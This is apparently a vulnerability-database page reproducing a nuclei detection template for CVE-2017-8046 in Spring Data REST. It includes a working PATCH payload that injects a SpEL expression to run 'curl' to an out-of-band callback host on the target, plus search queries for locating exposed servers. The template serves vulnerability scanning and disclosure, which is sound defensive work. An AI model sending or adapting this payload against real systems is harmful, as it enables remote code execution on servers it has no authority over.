CVE-2017-8046: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution

日期: 2025-08-01 | 影响软件: Spring Data REST | POC: 已公开

漏洞描述

Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.

PoC代码[已公开]

id: CVE-2017-8046

info:
  name: Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
  author: domwhewell-sage
  severity: critical
  description: |
    Spring Data REST < 2.6.9 and 3.0.1, Spring Boot < 1.5.9 and 2.0 M6 contain a remote code execution caused by processing malicious PATCH requests with crafted JSON data, letting attackers execute arbitrary Java code, exploit requires sending malicious PATCH requests.
  impact: |
    Malicious PATCH requests submitted to servers using Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1) and Spring Boot versions prior to 1.5.9, 2.0 M6 can use specially crafted JSON data to run arbitrary Java code.
  remediation: |
    To remediate this vulnerability, update to Spring Data REST version 2.6.9 or later, or 3.0.1 or later, and Spring Boot version 1.5.9 or later, or 2.0 M6 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2017-8046
    - https://spring.io/security/cve-2017-8046
    - https://access.redhat.com/errata/RHSA-2018:2405
    - https://www.exploit-db.com/exploits/44289/
    - https://github.com/jkutner/spring-break-cve-2017-8046
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-8046
    cwe-id: CWE-20
    epss-score: 0.93302
    epss-percentile: 0.99804
    cpe: cpe:2.3:a:vmware:spring_boot:*:*:*:*:*:*:*:*
  metadata:
    vendor: vmware
    product: spring_boot
    shodan-query: http.title:"eureka"
    fofa-query: title="eureka"
    google-query: intitle:"eureka"
  tags: cve,cve2017,pivotal,springboot,pivotal_software
flow: |
  http(1)
  set("endpoint", iterate(template.endpoint)[0])
  http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    redirects: true
    max-redirects: 3

    matchers-condition: and
    matchers:
      - type: word
        internal: true
        part: header
        words:
          - "application/json"
          - "application/hal+json"
          - "application/vnd.spring-boot.actuator"
        condition: or

      - type: word
        internal: true
        part: body
        words:
          - '"_embedded"'
          - '"_links"'
          - '"page"'
          - '"size"'
        condition: or

    extractors:
      - type: regex
        name: endpoint
        part: body
        group: 1
        internal: true
        regex:
          - '"href"\s*:\s*"([^"]+)\{\?page,size,sort\}"'

  - method: PATCH
    path:
      - "{{endpoint}}/1"
    headers:
      Content-Type: application/json-patch+json
    body: |
      [
        {
          "op": "replace",
          "path": "T(java.lang.Runtime).getRuntime().exec(\"curl {{interactsh-url}}\").x",
          "value": "CVE-2017-8046"
        }
      ]

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        part: body
        words:
          - "org.springframework"
# digest: 4a0a004730450220459240b5a36b3585796b7411ff3e3a778911bed9cb57874a860fda578b272ef9022100d3a32265b67bcd8bb66fd756d237c10d18b573953a7d21c3b93ffeeb3fe836e8:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2017/CVE-2017-8046.yaml

相关漏洞推荐